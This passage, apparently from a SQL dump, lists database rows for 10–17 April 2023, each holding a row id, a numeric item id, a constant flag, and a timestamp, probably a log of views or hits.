19:05:01'),(73650,5046,1,'2023-04-10','2023-04-10 19:05:12'),(73651,5046,1,'2023-04-10','2023-04-10 19:05:14'),(73652,91,1,'2023-04-10','2023-04-10 19:05:32'),(73653,2751,1,'2023-04-10','2023-04-10 19:07:58'),(73654,3063,1,'2023-04-10','2023-04-10 19:10:10'),(73655,2503,1,'2023-04-10','2023-04-10 19:11:02'),(73656,84,1,'2023-04-10','2023-04-10 19:11:44'),(73657,68,1,'2023-04-10','2023-04-10 19:12:57'),(73658,2503,1,'2023-04-10','2023-04-10 19:56:06'),(73659,4963,1,'2023-04-10','2023-04-10 20:53:45'),(73660,4963,1,'2023-04-10','2023-04-10 22:14:52'),(73661,4911,1,'2023-04-10','2023-04-10 22:19:12'),(73662,5163,1,'2023-04-10','2023-04-10 22:40:19'),(73663,5163,1,'2023-04-10','2023-04-10 22:40:29'),(73664,469,1,'2023-04-10','2023-04-10 23:44:47'),(73665,3023,1,'2023-04-11','2023-04-11 01:50:15'),(73666,3752,1,'2023-04-11','2023-04-11 01:57:23'),(73667,4566,1,'2023-04-11','2023-04-11 02:49:42'),(73668,3005,1,'2023-04-11','2023-04-11 03:04:41'),(73669,4960,1,'2023-04-11','2023-04-11 06:19:05'),(73670,4960,1,'2023-04-11','2023-04-11 06:24:12'),(73671,4911,1,'2023-04-11','2023-04-11 06:29:24'),(73672,5163,1,'2023-04-11','2023-04-11 06:38:49'),(73673,2751,1,'2023-04-11','2023-04-11 06:53:40'),(73674,76,1,'2023-04-11','2023-04-11 06:56:56'),(73675,76,1,'2023-04-11','2023-04-11 06:57:33'),(73676,2751,1,'2023-04-11','2023-04-11 06:57:33'),(73677,3257,1,'2023-04-11','2023-04-11 07:01:45'),(73678,4238,1,'2023-04-11','2023-04-11 07:49:24'),(73679,4412,1,'2023-04-11','2023-04-11 08:02:45'),(73680,2411,1,'2023-04-11','2023-04-11 08:05:21'),(73681,4654,1,'2023-04-11','2023-04-11 08:06:57'),(73682,1608,1,'2023-04-11','2023-04-11 09:42:05'),(73683,4436,1,'2023-04-11','2023-04-11 10:01:12'),(73684,4520,1,'2023-04-11','2023-04-11 10:06:44'),(73685,1588,1,'2023-04-11','2023-04-11 10:23:10'),(73686,4436,1,'2023-04-11','2023-04-11 10:56:03'),(73687,2804,1,'2023-04-11','2023-04-11 10:59:20'),(73688,4960,1,'2023-04-11','2023-04-11 11:40:52'),(73689,4960,1,'2023-04-11','2023-04-11 11:43:03'),(73690,3498,1,'2023-04-11','2023-04-11 11:51:59'),(73691,1594,1,'2023-04-11','2023-04-11 12:45:58'),(73692,4911,1,'2023-04-11','2023-04-11 12:55:09'),(73693,1596,1,'2023-04-11','2023-04-11 13:05:11'),(73694,4966,1,'2023-04-11','2023-04-11 13:21:30'),(73695,470,1,'2023-04-11','2023-04-11 13:32:53'),(73696,4691,1,'2023-04-11','2023-04-11 13:35:44'),(73697,1766,1,'2023-04-11','2023-04-11 14:12:10'),(73698,1594,1,'2023-04-11','2023-04-11 14:15:57'),(73699,4448,1,'2023-04-11','2023-04-11 14:21:28'),(73700,1596,1,'2023-04-11','2023-04-11 14:34:56'),(73701,1594,1,'2023-04-11','2023-04-11 14:41:38'),(73702,5067,1,'2023-04-11','2023-04-11 15:03:10'),(73703,1612,1,'2023-04-11','2023-04-11 16:09:42'),(73704,2293,1,'2023-04-11','2023-04-11 16:41:18'),(73705,5334,1,'2023-04-11','2023-04-11 16:58:55'),(73706,3691,1,'2023-04-11','2023-04-11 16:59:00'),(73707,468,1,'2023-04-11','2023-04-11 17:26:04'),(73708,1598,1,'2023-04-11','2023-04-11 17:49:33'),(73709,1602,1,'2023-04-11','2023-04-11 18:00:07'),(73710,3752,1,'2023-04-11','2023-04-11 18:02:32'),(73711,4694,1,'2023-04-11','2023-04-11 18:07:30'),(73712,335,1,'2023-04-11','2023-04-11 18:11:17'),(73713,2293,1,'2023-04-11','2023-04-11 18:56:06'),(73714,3023,1,'2023-04-11','2023-04-11 19:47:22'),(73715,5256,1,'2023-04-11','2023-04-11 19:52:30'),(73716,3257,1,'2023-04-11','2023-04-11 21:05:05'),(73717,3764,1,'2023-04-11','2023-04-11 23:16:25'),(73718,2904,1,'2023-04-11','2023-04-11 23:58:14'),(73719,3781,1,'2023-04-12','2023-04-12 02:04:23'),(73720,3781,1,'2023-04-12','2023-04-12 02:12:55'),(73721,1594,1,'2023-04-12','2023-04-12 02:16:15'),(73722,5323,1,'2023-04-12','2023-04-12 02:28:36'),(73723,3023,1,'2023-04-12','2023-04-12 03:12:18'),(73724,4911,1,'2023-04-12','2023-04-12 03:57:04'),(73725,80,1,'2023-04-12','2023-04-12 03:57:23'),(73726,4911,1,'2023-04-12','2023-04-12 03:57:53'),(73727,1582,1,'2023-04-12','2023-04-12 04:18:18'),(73728,1594,1,'2023-04-12','2023-04-12 04:58:37'),(73729,1600,1,'2023-04-12','2023-04-12 05:22:17'),(73730,4858,1,'2023-04-12','2023-04-12 05:44:51'),(73731,1610,1,'2023-04-12','2023-04-12 06:13:58'),(73732,4412,1,'2023-04-12','2023-04-12 06:25:30'),(73733,1600,1,'2023-04-12','2023-04-12 06:26:06'),(73734,467,1,'2023-04-12','2023-04-12 06:27:57'),(73735,2904,1,'2023-04-12','2023-04-12 06:55:22'),(73736,570,1,'2023-04-12','2023-04-12 07:06:00'),(73737,2457,1,'2023-04-12','2023-04-12 07:21:32'),(73738,1582,1,'2023-04-12','2023-04-12 07:58:30'),(73739,4648,1,'2023-04-12','2023-04-12 08:00:46'),(73740,74,1,'2023-04-12','2023-04-12 08:01:43'),(73741,1582,1,'2023-04-12','2023-04-12 08:02:29'),(73742,4858,1,'2023-04-12','2023-04-12 08:48:41'),(73743,4608,1,'2023-04-12','2023-04-12 08:55:59'),(73744,468,1,'2023-04-12','2023-04-12 09:19:49'),(73745,91,1,'2023-04-12','2023-04-12 09:20:09'),(73746,1724,1,'2023-04-12','2023-04-12 09:26:31'),(73747,5163,1,'2023-04-12','2023-04-12 09:37:55'),(73748,5163,1,'2023-04-12','2023-04-12 09:38:19'),(73749,4612,1,'2023-04-12','2023-04-12 10:21:18'),(73750,470,1,'2023-04-12','2023-04-12 10:25:39'),(73751,4840,1,'2023-04-12','2023-04-12 11:10:17'),(73752,4930,1,'2023-04-12','2023-04-12 11:15:08'),(73753,72,1,'2023-04-12','2023-04-12 11:15:44'),(73754,5346,1,'2023-04-12','2023-04-12 11:16:17'),(73755,2503,1,'2023-04-12','2023-04-12 11:16:46'),(73756,89,1,'2023-04-12','2023-04-12 11:28:34'),(73757,89,1,'2023-04-12','2023-04-12 11:28:48'),(73758,1612,1,'2023-04-12','2023-04-12 11:28:58'),(73759,89,1,'2023-04-12','2023-04-12 11:29:16'),(73760,89,1,'2023-04-12','2023-04-12 11:29:27'),(73761,1582,1,'2023-04-12','2023-04-12 11:29:34'),(73762,2558,1,'2023-04-12','2023-04-12 11:46:23'),(73763,4911,1,'2023-04-12','2023-04-12 12:14:36'),(73764,5163,1,'2023-04-12','2023-04-12 12:35:02'),(73765,5163,1,'2023-04-12','2023-04-12 12:35:15'),(73766,5163,1,'2023-04-12','2023-04-12 12:40:50'),(73767,3023,1,'2023-04-12','2023-04-12 12:49:12'),(73768,4911,1,'2023-04-12','2023-04-12 13:55:49'),(73769,1588,1,'2023-04-12','2023-04-12 14:01:40'),(73770,4432,1,'2023-04-12','2023-04-12 14:05:53'),(73771,2411,1,'2023-04-12','2023-04-12 14:09:19'),(73772,4238,1,'2023-04-12','2023-04-12 14:18:25'),(73773,5071,1,'2023-04-12','2023-04-12 14:41:22'),(73774,3691,1,'2023-04-12','2023-04-12 14:50:50'),(73775,4432,1,'2023-04-12','2023-04-12 14:55:16'),(73776,1614,1,'2023-04-12','2023-04-12 15:22:40'),(73777,80,1,'2023-04-12','2023-04-12 15:27:05'),(73778,1614,1,'2023-04-12','2023-04-12 15:27:10'),(73779,5128,1,'2023-04-12','2023-04-12 16:08:16'),(73780,4944,1,'2023-04-12','2023-04-12 16:25:15'),(73781,3109,1,'2023-04-12','2023-04-12 16:28:51'),(73782,5163,1,'2023-04-12','2023-04-12 17:41:25'),(73783,5317,1,'2023-04-12','2023-04-12 17:49:11'),(73784,4654,1,'2023-04-12','2023-04-12 18:09:28'),(73785,76,1,'2023-04-12','2023-04-12 18:15:24'),(73786,3691,1,'2023-04-12','2023-04-12 18:29:10'),(73787,5276,1,'2023-04-12','2023-04-12 18:54:30'),(73788,2309,1,'2023-04-12','2023-04-12 18:58:10'),(73789,4657,1,'2023-04-12','2023-04-12 19:39:30'),(73790,4660,1,'2023-04-12','2023-04-12 20:35:42'),(73791,5005,1,'2023-04-12','2023-04-12 21:18:31'),(73792,72,1,'2023-04-12','2023-04-12 22:12:01'),(73793,4420,1,'2023-04-12','2023-04-12 22:12:30'),(73794,3789,1,'2023-04-12','2023-04-12 22:48:57'),(73795,4966,1,'2023-04-12','2023-04-12 22:55:01'),(73796,4966,1,'2023-04-12','2023-04-12 22:59:02'),(73797,470,1,'2023-04-13','2023-04-13 00:02:37'),(73798,470,1,'2023-04-13','2023-04-13 00:03:13'),(73799,2154,1,'2023-04-13','2023-04-13 01:11:11'),(73800,5005,1,'2023-04-13','2023-04-13 03:02:26'),(73801,5128,1,'2023-04-13','2023-04-13 03:56:38'),(73802,4950,1,'2023-04-13','2023-04-13 04:35:44'),(73803,4485,1,'2023-04-13','2023-04-13 04:47:29'),(73804,3764,1,'2023-04-13','2023-04-13 05:35:44'),(73805,4753,1,'2023-04-13','2023-04-13 06:05:42'),(73806,3090,1,'2023-04-13','2023-04-13 06:07:26'),(73807,3023,1,'2023-04-13','2023-04-13 06:07:32'),(73808,5071,1,'2023-04-13','2023-04-13 06:32:59'),(73809,3789,1,'2023-04-13','2023-04-13 06:37:31'),(73810,3038,1,'2023-04-13','2023-04-13 07:31:45'),(73811,5163,1,'2023-04-13','2023-04-13 07:50:53'),(73812,91,1,'2023-04-13','2023-04-13 07:51:47'),(73813,4412,1,'2023-04-13','2023-04-13 08:01:46'),(73814,5163,1,'2023-04-13','2023-04-13 08:01:53'),(73815,91,1,'2023-04-13','2023-04-13 08:02:58'),(73816,1594,1,'2023-04-13','2023-04-13 08:18:26'),(73817,4657,1,'2023-04-13','2023-04-13 08:24:11'),(73818,3226,1,'2023-04-13','2023-04-13 08:26:05'),(73819,5005,1,'2023-04-13','2023-04-13 08:33:44'),(73820,1608,1,'2023-04-13','2023-04-13 08:48:03'),(73821,108,1,'2023-04-13','2023-04-13 09:11:38'),(73822,4341,1,'2023-04-13','2023-04-13 09:40:45'),(73823,4966,1,'2023-04-13','2023-04-13 09:52:51'),(73824,76,1,'2023-04-13','2023-04-13 09:53:56'),(73825,68,1,'2023-04-13','2023-04-13 09:54:21'),(73826,3004,1,'2023-04-13','2023-04-13 10:11:04'),(73827,5163,1,'2023-04-13','2023-04-13 10:22:38'),(73828,4911,1,'2023-04-13','2023-04-13 11:04:19'),(73829,4911,1,'2023-04-13','2023-04-13 11:05:51'),(73830,4911,1,'2023-04-13','2023-04-13 11:06:32'),(73831,2813,1,'2023-04-13','2023-04-13 11:10:28'),(73832,2813,1,'2023-04-13','2023-04-13 11:32:48'),(73833,5024,1,'2023-04-13','2023-04-13 11:39:54'),(73834,5163,1,'2023-04-13','2023-04-13 12:00:42'),(73835,4412,1,'2023-04-13','2023-04-13 12:14:46'),(73836,3226,1,'2023-04-13','2023-04-13 12:14:47'),(73837,4966,1,'2023-04-13','2023-04-13 12:15:37'),(73838,4911,1,'2023-04-13','2023-04-13 12:18:48'),(73839,5163,1,'2023-04-13','2023-04-13 12:22:22'),(73840,5058,1,'2023-04-13','2023-04-13 12:37:16'),(73841,84,1,'2023-04-13','2023-04-13 13:00:42'),(73842,4963,1,'2023-04-13','2023-04-13 13:03:29'),(73843,1877,1,'2023-04-13','2023-04-13 13:05:50'),(73844,76,1,'2023-04-13','2023-04-13 13:06:55'),(73845,68,1,'2023-04-13','2023-04-13 13:09:38'),(73846,2609,1,'2023-04-13','2023-04-13 13:11:50'),(73847,4911,1,'2023-04-13','2023-04-13 13:14:41'),(73848,80,1,'2023-04-13','2023-04-13 13:15:19'),(73849,2410,1,'2023-04-13','2023-04-13 13:46:52'),(73850,68,1,'2023-04-13','2023-04-13 14:02:18'),(73851,2297,1,'2023-04-13','2023-04-13 15:13:32'),(73852,3285,1,'2023-04-13','2023-04-13 15:14:10'),(73853,4753,1,'2023-04-13','2023-04-13 15:20:13'),(73854,4963,1,'2023-04-13','2023-04-13 15:40:16'),(73855,2609,1,'2023-04-13','2023-04-13 15:43:36'),(73856,2410,1,'2023-04-13','2023-04-13 15:52:07'),(73857,5163,1,'2023-04-13','2023-04-13 15:53:54'),(73858,5320,1,'2023-04-13','2023-04-13 15:55:44'),(73859,5334,1,'2023-04-13','2023-04-13 15:56:32'),(73860,5317,1,'2023-04-13','2023-04-13 15:57:35'),(73861,5163,1,'2023-04-13','2023-04-13 15:58:51'),(73862,4648,1,'2023-04-13','2023-04-13 16:32:18'),(73863,4911,1,'2023-04-13','2023-04-13 16:33:32'),(73864,5317,1,'2023-04-13','2023-04-13 16:43:42'),(73865,3251,1,'2023-04-13','2023-04-13 16:45:39'),(73866,4238,1,'2023-04-13','2023-04-13 17:49:49'),(73867,91,1,'2023-04-13','2023-04-13 18:14:24'),(73868,5256,1,'2023-04-13','2023-04-13 18:29:01'),(73869,1600,1,'2023-04-13','2023-04-13 18:30:04'),(73870,5317,1,'2023-04-13','2023-04-13 19:43:29'),(73871,5256,1,'2023-04-13','2023-04-13 19:59:00'),(73872,3004,1,'2023-04-13','2023-04-13 21:36:03'),(73873,3023,1,'2023-04-13','2023-04-13 22:16:20'),(73874,5334,1,'2023-04-13','2023-04-13 23:09:42'),(73875,4357,1,'2023-04-14','2023-04-14 01:01:43'),(73876,5343,1,'2023-04-14','2023-04-14 01:35:13'),(73877,4976,1,'2023-04-14','2023-04-14 01:52:28'),(73878,3664,1,'2023-04-14','2023-04-14 02:23:52'),(73879,4950,1,'2023-04-14','2023-04-14 02:44:22'),(73880,4648,1,'2023-04-14','2023-04-14 03:45:38'),(73881,5320,1,'2023-04-14','2023-04-14 03:50:33'),(73882,5320,1,'2023-04-14','2023-04-14 04:23:24'),(73883,4663,1,'2023-04-14','2023-04-14 04:32:24'),(73884,4301,1,'2023-04-14','2023-04-14 04:36:54'),(73885,5334,1,'2023-04-14','2023-04-14 06:52:34'),(73886,1544,1,'2023-04-14','2023-04-14 07:55:39'),(73887,1598,1,'2023-04-14','2023-04-14 08:31:09'),(73888,3226,1,'2023-04-14','2023-04-14 08:55:58'),(73889,5280,1,'2023-04-14','2023-04-14 09:25:37'),(73890,1582,1,'2023-04-14','2023-04-14 09:32:13'),(73891,91,1,'2023-04-14','2023-04-14 09:33:13'),(73892,5050,1,'2023-04-14','2023-04-14 09:34:52'),(73893,5062,1,'2023-04-14','2023-04-14 09:35:31'),(73894,5071,1,'2023-04-14','2023-04-14 09:36:22'),(73895,2395,1,'2023-04-14','2023-04-14 09:37:39'),(73896,3023,1,'2023-04-14','2023-04-14 09:59:40'),(73897,5146,1,'2023-04-14','2023-04-14 10:20:04'),(73898,5264,1,'2023-04-14','2023-04-14 10:20:16'),(73899,1610,1,'2023-04-14','2023-04-14 10:28:44'),(73900,4827,1,'2023-04-14','2023-04-14 11:20:56'),(73901,4983,1,'2023-04-14','2023-04-14 12:38:31'),(73902,1594,1,'2023-04-14','2023-04-14 13:11:18'),(73903,1588,1,'2023-04-14','2023-04-14 13:28:36'),(73904,1590,1,'2023-04-14','2023-04-14 13:28:57'),(73905,1588,1,'2023-04-14','2023-04-14 13:29:17'),(73906,2704,1,'2023-04-14','2023-04-14 13:29:24'),(73907,1588,1,'2023-04-14','2023-04-14 13:29:44'),(73908,5323,1,'2023-04-14','2023-04-14 13:55:05'),(73909,80,1,'2023-04-14','2023-04-14 14:07:47'),(73910,5264,1,'2023-04-14','2023-04-14 14:13:06'),(73911,1544,1,'2023-04-14','2023-04-14 14:41:22'),(73912,4498,1,'2023-04-14','2023-04-14 15:00:30'),(73913,5054,1,'2023-04-14','2023-04-14 15:13:11'),(73914,5323,1,'2023-04-14','2023-04-14 15:19:39'),(73915,2309,1,'2023-04-14','2023-04-14 16:12:13'),(73916,4542,1,'2023-04-14','2023-04-14 16:45:39'),(73917,3674,1,'2023-04-14','2023-04-14 17:14:00'),(73918,4911,1,'2023-04-14','2023-04-14 17:21:28'),(73919,5028,1,'2023-04-14','2023-04-14 17:43:54'),(73920,570,1,'2023-04-14','2023-04-14 18:21:40'),(73921,2297,1,'2023-04-14','2023-04-14 19:13:54'),(73922,5253,1,'2023-04-14','2023-04-14 20:07:40'),(73923,4960,1,'2023-04-14','2023-04-14 20:13:17'),(73924,1596,1,'2023-04-14','2023-04-14 20:18:37'),(73925,1724,1,'2023-04-14','2023-04-14 20:19:17'),(73926,4546,1,'2023-04-14','2023-04-14 20:32:58'),(73927,2297,1,'2023-04-14','2023-04-14 20:37:44'),(73928,3124,1,'2023-04-14','2023-04-14 20:37:54'),(73929,2297,1,'2023-04-14','2023-04-14 20:43:55'),(73930,1582,1,'2023-04-14','2023-04-14 21:37:41'),(73931,5317,1,'2023-04-14','2023-04-14 22:07:46'),(73932,4612,1,'2023-04-14','2023-04-14 22:08:32'),(73933,91,1,'2023-04-14','2023-04-14 22:13:58'),(73934,5259,1,'2023-04-14','2023-04-14 22:38:57'),(73935,1582,1,'2023-04-14','2023-04-14 22:44:48'),(73936,5343,1,'2023-04-14','2023-04-14 22:47:19'),(73937,5264,1,'2023-04-14','2023-04-14 22:55:01'),(73938,4457,1,'2023-04-14','2023-04-14 23:37:45'),(73939,89,1,'2023-04-14','2023-04-14 23:45:40'),(73940,5157,1,'2023-04-14','2023-04-14 23:54:00'),(73941,4960,1,'2023-04-14','2023-04-14 23:58:01'),(73942,5280,1,'2023-04-15','2023-04-15 00:34:52'),(73943,5276,1,'2023-04-15','2023-04-15 00:44:41'),(73944,1600,1,'2023-04-15','2023-04-15 00:44:50'),(73945,5280,1,'2023-04-15','2023-04-15 00:51:15'),(73946,5295,1,'2023-04-15','2023-04-15 00:52:11'),(73947,5280,1,'2023-04-15','2023-04-15 00:52:51'),(73948,3664,1,'2023-04-15','2023-04-15 01:37:56'),(73949,4323,1,'2023-04-15','2023-04-15 01:49:47'),(73950,2904,1,'2023-04-15','2023-04-15 02:06:57'),(73951,4412,1,'2023-04-15','2023-04-15 02:14:45'),(73952,1598,1,'2023-04-15','2023-04-15 02:49:53'),(73953,4551,1,'2023-04-15','2023-04-15 02:59:47'),(73954,1728,1,'2023-04-15','2023-04-15 03:41:28'),(73955,4911,1,'2023-04-15','2023-04-15 03:58:44'),(73956,2309,1,'2023-04-15','2023-04-15 03:59:23'),(73957,89,1,'2023-04-15','2023-04-15 04:07:20'),(73958,4960,1,'2023-04-15','2023-04-15 04:21:32'),(73959,1544,1,'2023-04-15','2023-04-15 04:23:39'),(73960,1588,1,'2023-04-15','2023-04-15 04:42:53'),(73961,89,1,'2023-04-15','2023-04-15 04:58:31'),(73962,5157,1,'2023-04-15','2023-04-15 05:06:31'),(73963,2309,1,'2023-04-15','2023-04-15 05:39:43'),(73964,4485,1,'2023-04-15','2023-04-15 06:16:46'),(73965,3226,1,'2023-04-15','2023-04-15 07:52:48'),(73966,4412,1,'2023-04-15','2023-04-15 08:19:19'),(73967,1588,1,'2023-04-15','2023-04-15 08:41:29'),(73968,470,1,'2023-04-15','2023-04-15 09:37:55'),(73969,4980,1,'2023-04-15','2023-04-15 09:48:50'),(73970,2309,1,'2023-04-15','2023-04-15 09:50:02'),(73971,5264,1,'2023-04-15','2023-04-15 10:34:52'),(73972,470,1,'2023-04-15','2023-04-15 11:18:51'),(73973,1594,1,'2023-04-15','2023-04-15 11:58:24'),(73974,4980,1,'2023-04-15','2023-04-15 12:28:03'),(73975,68,1,'2023-04-15','2023-04-15 14:07:19'),(73976,4960,1,'2023-04-15','2023-04-15 14:12:49'),(73977,4448,1,'2023-04-15','2023-04-15 14:40:46'),(73978,4556,1,'2023-04-15','2023-04-15 15:52:24'),(73979,3030,1,'2023-04-15','2023-04-15 16:28:48'),(73980,4878,1,'2023-04-15','2023-04-15 16:29:47'),(73981,3781,1,'2023-04-15','2023-04-15 16:47:09'),(73982,3781,1,'2023-04-15','2023-04-15 16:47:35'),(73983,5153,1,'2023-04-15','2023-04-15 17:12:51'),(73984,4448,1,'2023-04-15','2023-04-15 17:41:48'),(73985,5071,1,'2023-04-15','2023-04-15 17:48:16'),(73986,5334,1,'2023-04-15','2023-04-15 19:09:44'),(73987,1600,1,'2023-04-15','2023-04-15 20:10:09'),(73988,1598,1,'2023-04-15','2023-04-15 20:17:06'),(73989,3034,1,'2023-04-15','2023-04-15 20:18:56'),(73990,1600,1,'2023-04-15','2023-04-15 21:09:29'),(73991,3079,1,'2023-04-15','2023-04-15 21:26:20'),(73992,4966,1,'2023-04-15','2023-04-15 22:07:03'),(73993,469,1,'2023-04-15','2023-04-15 22:56:18'),(73994,4341,1,'2023-04-15','2023-04-15 22:58:09'),(73995,4612,1,'2023-04-16','2023-04-16 00:13:06'),(73996,1582,1,'2023-04-16','2023-04-16 01:19:32'),(73997,1582,1,'2023-04-16','2023-04-16 01:40:07'),(73998,91,1,'2023-04-16','2023-04-16 01:41:06'),(73999,4930,1,'2023-04-16','2023-04-16 01:41:22'),(74000,4944,1,'2023-04-16','2023-04-16 01:41:48'),(74001,4930,1,'2023-04-16','2023-04-16 01:42:21'),(74002,87,1,'2023-04-16','2023-04-16 01:42:30'),(74003,4930,1,'2023-04-16','2023-04-16 01:43:50'),(74004,91,1,'2023-04-16','2023-04-16 01:43:59'),(74005,2775,1,'2023-04-16','2023-04-16 02:04:31'),(74006,5125,1,'2023-04-16','2023-04-16 02:25:06'),(74007,3285,1,'2023-04-16','2023-04-16 03:01:32'),(74008,5264,1,'2023-04-16','2023-04-16 04:31:31'),(74009,1606,1,'2023-04-16','2023-04-16 05:13:22'),(74010,5343,1,'2023-04-16','2023-04-16 06:42:52'),(74011,1608,1,'2023-04-16','2023-04-16 08:25:26'),(74012,4911,1,'2023-04-16','2023-04-16 08:28:58'),(74013,1724,1,'2023-04-16','2023-04-16 09:18:39'),(74014,108,1,'2023-04-16','2023-04-16 09:19:44'),(74015,87,1,'2023-04-16','2023-04-16 09:19:58'),(74016,76,1,'2023-04-16','2023-04-16 09:20:53'),(74017,89,1,'2023-04-16','2023-04-16 09:22:50'),(74018,1588,1,'2023-04-16','2023-04-16 09:23:01'),(74019,89,1,'2023-04-16','2023-04-16 09:33:51'),(74020,89,1,'2023-04-16','2023-04-16 09:33:52'),(74021,470,1,'2023-04-16','2023-04-16 10:11:54'),(74022,5271,1,'2023-04-16','2023-04-16 10:23:57'),(74023,80,1,'2023-04-16','2023-04-16 10:56:59'),(74024,2309,1,'2023-04-16','2023-04-16 11:33:45'),(74025,1745,1,'2023-04-16','2023-04-16 11:37:10'),(74026,72,1,'2023-04-16','2023-04-16 12:14:00'),(74027,4412,1,'2023-04-16','2023-04-16 12:27:50'),(74028,469,1,'2023-04-16','2023-04-16 12:39:04'),(74029,80,1,'2023-04-16','2023-04-16 13:03:52'),(74030,4759,1,'2023-04-16','2023-04-16 13:07:03'),(74031,4420,1,'2023-04-16','2023-04-16 14:08:26'),(74032,3313,1,'2023-04-16','2023-04-16 15:03:50'),(74033,5271,1,'2023-04-16','2023-04-16 16:30:07'),(74034,1612,1,'2023-04-16','2023-04-16 19:08:16'),(74035,5320,1,'2023-04-16','2023-04-16 19:33:59'),(74036,4520,1,'2023-04-16','2023-04-16 20:21:30'),(74037,1596,1,'2023-04-16','2023-04-16 20:58:36'),(74038,91,1,'2023-04-16','2023-04-16 21:08:21'),(74039,4960,1,'2023-04-16','2023-04-16 21:20:26'),(74040,4542,1,'2023-04-16','2023-04-16 21:43:38'),(74041,3781,1,'2023-04-16','2023-04-16 22:07:39'),(74042,3004,1,'2023-04-16','2023-04-16 22:08:09'),(74043,68,1,'2023-04-16','2023-04-16 22:21:33'),(74044,3083,1,'2023-04-16','2023-04-16 22:36:32'),(74045,1582,1,'2023-04-16','2023-04-16 22:38:16'),(74046,1612,1,'2023-04-16','2023-04-16 23:04:26'),(74047,4911,1,'2023-04-16','2023-04-16 23:19:32'),(74048,4762,1,'2023-04-16','2023-04-16 23:42:19'),(74049,1582,1,'2023-04-16','2023-04-16 23:47:59'),(74050,4412,1,'2023-04-17','2023-04-17 00:57:55'),(74051,4412,1,'2023-04-17','2023-04-17 01:01:01'),(74052,3698,1,'2023-04-17','2023-04-17 01:07:01'),(74053,1728,1,'2023-04-17','2023-04-17 01:07:05'),(74054,5323,1,'2023-04-17','2023-04-17 01:11:59'),(74055,2804,1,'2023-04-17','2023-04-17 01:51:58'),(74056,1582,1,'2023-04-17','2023-04-17 01:57:18'),(74057,4930,1,'2023-04-17','2023-04-17 01:58:07'),(74058,4941,1,'2023-04-17','2023-04-17 01:58:22'),(74059,4930,1,'2023-04-17','2023-04-17 01:58:31'),(74060,68,1,'2023-04-17','2023-04-17 01:58:39'),(74061,3004,1,'2023-04-17','2023-04-17 02:36:36'),(74062,3004,1,'2023-04-17','2023-04-17 02:36:49'),(74063,1608,1,'2023-04-17','2023-04-17 02:37:21'),(74064,91,1,'2023-04-17','2023-04-17 02:39:01'),(74065,3285,1,'2023-04-17','2023-04-17 02:45:06'),(74066,68,1,'2023-04-17','2023-04-17 03:36:45'),(74067,3004,1,'2023-04-17','2023-04-17 05:14:37'),(74068,4485,1,'2023-04-17','2023-04-17 07:12:03'),(74069,1745,1,'2023-04-17','2023-04-17 07:26:34'),(74070,2309,1,'2023-04-17','2023-04-17 08:39:21'),(74071,4485,1,'2023-04-17','2023-04-17 08:42:05'),(74072,3060,1,'2023-04-17','2023-04-17 08:57:03'),(74073,4412,1,'2023-04-17','2023-04-17 10:54:53'),(74074,4412,1,'2023-04-17','2023-04-17 11:12:04'),(74075,2395,1,'2023-04-17','2023-04-17 11:29:13'),(74076,4842,1,'2023-04-17','2023-04-17 11:57:03'),(74077,4842,1,'2023-04-17','2023-04-17 11:57:05'),(74078,1582,1,'2023-04-17','2023-04-17 13:00:01'),(74079,5292,1,'2023-04-17','2023-04-17 13:20:03'),(74080,4971,1,'2023-04-17','2023-04-17 13:27:05'),(74081,5163,1,'2023-04-17','2023-04-17 13:51:28'),(74082,4963,1,'2023-04-17','2023-04-17 13:51:45'),(74083,3691,1,'2023-04-17','2023-04-17 14:26:56'),(74084,4691,1,'2023-04-17','2023-04-17 14:40:15'),(74085,1596,1,'2023-04-17','2023-04-17 14:40:17'),(74086,5163,1,'2023-04-17','2023-04-17 14:42:46'),(74087,5163,1,'2023-04-17','2023-04-17 14:45:24'),(74088,5163,1,'2023-04-17','2023-04-17 14:47:25'),(74089,4412,1,'2023-04-17','2023-04-17 14:56:01'),(74090,4416,1,'2023-04-17','2023-04-17 15:31:20'),(74091,4938,1,'2023-04-17','2023-04-17 15:36:43'),(74092,80,1,'2023-04-17','2023-04-17 15:37:38'),(74093,91,1,'2023-04-17','2023-04-17 15:44:03'),(74094,91,1,'2023-04-17','2023-04-17 15:44:48'),(74095,5326,1,'2023-04-17','2023-04-17 15:46:33'),(74096,5326,1,'2023-04-17','2023-04-17 15:46:37'),(74097,1604,1,'2023-04-17','2023-04-17 15:50:14'),(74098,1582,1,'2023-04-17','2023-04-17 15:55:22'),(74099,91,1,'2023-04-17','2023-04-17 15:57:33'),(74100,5080,1,'2023-04-17','2023-04-17 15:59:13'),(74101,5080,1,'2023-04-17','2023-04-17 15:59:13'),(74102,91,1,'2023-04-17','2023-04-17 16:03:21'),(74103,5076,1,'2023-04-17','2023-04-17 16:04:00'),(74104,5076,1,'2023-04-17','2023-04-17 16:04:01'),(74105,4911,1,'2023-04-17','2023-04-17 16:04:39'),(74106,91,1,'2023-04-17','2023-04-17 16:06:23'),(74107,3253,1,'2023-04-17','2023-04-17 16:10:05'),(74108,1594,1,'2023-04-17','2023-04-17 16:14:12'),(74109,1594,1,'2023-04-17','2023-04-17 16:15:14'),(74110,5163,1,'2023-04-17','2023-04-17 16:26:29'),(74111,4911,1,'2023-04-17','2023-04-17 16:29:26'),(74112,3731,1,'2023-04-17','2023-04-17 16:29:46'),(74113,1722,1,'2023-04-17','2023-04-17 16:36:59'),(74114,1596,1,'2023-04-17','2023-04-17 16:37:47'),(74115,1711,1,'2023-04-17','2023-04-17 16:45:29'),(74116,5317,1,'2023-04-17','2023-04-17 17:43:07'),(74117,2154,1,'2023-04-17','2023-04-17 18:09:51'),(74118,4911,1,'2023-04-17','2023-04-17 18:52:54'),(74119,89,1,'2023-04-17','2023-04-17 19:09:31'),(74120,5137,1,'2023-04-17','2023-04-17 19:13:05'),(74121,4911,1,'2023-04-17','2023-04-17 19:14:41'),(74122,5264,1,'2023-04-17','2023-04-17 19:22:00'),(74123,91,1,'2023-04-17','2023-04-17 19:23:07'),(74124,5264,1,'2023-04-17','2023-04-17 19:25:10'),(74125,4842,1,'2023-04-17','2023-04-17 20:02:30'),(74126,5163,1,'2023-04-17','2023-04-17 20:23:22'),(74127,3781,1,'2023-04-17','2023-04-17 20:39:31'),(74128,91,1,'2023-04-17','2023-04-17 20:43:12'),(74129,4591,1,'2023-04-17','2023-04-17 21:23:40'),(74130,91,1,'2023-04-17','2023-04-17 21:24:21'),(74131,4862,1,'2023-04-17','2023-04-17 21:28:34'),(74132,4911,1,'2023-04-17','2023-04-17 21:31:46'),(74133,91,1,'2023-04-17','2023-04-17 21:32:40'),(74134,4911,1,'2023-04-17','2023-04-17 22:00:50'),(74135,4587,1,'2023-04-17','2023-04-17 